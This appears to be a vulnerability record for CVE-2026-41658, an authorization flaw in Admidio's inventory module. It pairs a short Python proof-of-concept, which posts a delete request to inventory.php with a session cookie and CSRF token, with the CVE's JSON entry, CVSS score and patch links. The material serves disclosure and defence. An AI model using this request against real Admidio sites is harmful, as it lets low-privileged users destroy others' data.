CVE-2026-41658

import requests # CVE-2026-41658 PoC Concept # Target: Admidio < 5.0.9 # Description: Exploit access control bypass in inventory module to delete items. # Note: This requires a valid authenticated session (cookie) and CSRF token. target_url = "http://target-admidio-site/admidio/modules/inventory.php" session_cookie = "PHPSESSID=attacker_session_id" # Replace with valid session # Note: CSRF token needs to be extracted from the page or previous requests if enforced csrf_token = "valid_csrf_token_from_page" # Payload to delete an inventory item payload = { "mode": "delete", "item_id": "1", # The ID of the item to delete "csrf_token": csrf_token } headers = { "Cookie": session_cookie, "Content-Type": "application/x-www-form-urlencoded" } response = requests.post(target_url, data=payload, headers=headers) if response.status_code == 200: print("Request sent. Check if item was deleted.") else: print(f"Failed with status code: {response.status_code}")

{"cve": {"id": "CVE-2026-41658", "sourceIdentifier": "[email protected]", "published": "2026-05-07T04:16:29.407", "lastModified": "2026-05-07T15:16:08.150", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Admidio is an open-source user management solution. Prior to version 5.0.9, the Admidio inventory module enforces authorization for destructive operations (delete, retire, reinstate) only in the UI layer by conditionally rendering buttons. The backend POST handlers at modules/inventory.php for item_delete, item_retire, item_reinstate, item_picture_upload, item_picture_save, and item_picture_delete perform CSRF validation but never check whether the requesting user is an inventory administrator. Any authenticated user who can access the inventory module can permanently delete any inventory item and all its associated data. This issue has been patched in version 5.0.9."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:N", "baseScore": 6.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "HIGH", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-862"}]}], "references": [{"url": "https://github.com/Admidio/admidio/releases/tag/v5.0.9", "source": "[email protected]"}, {"url": "https://github.com/Admidio/admidio/security/advisories/GHSA-xqv4-xm7h-52cv", "source": "[email protected]"}, {"url": "https://github.com/Admidio/admidio/security/advisories/GHSA-xqv4-xm7h-52cv", "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0"}]}}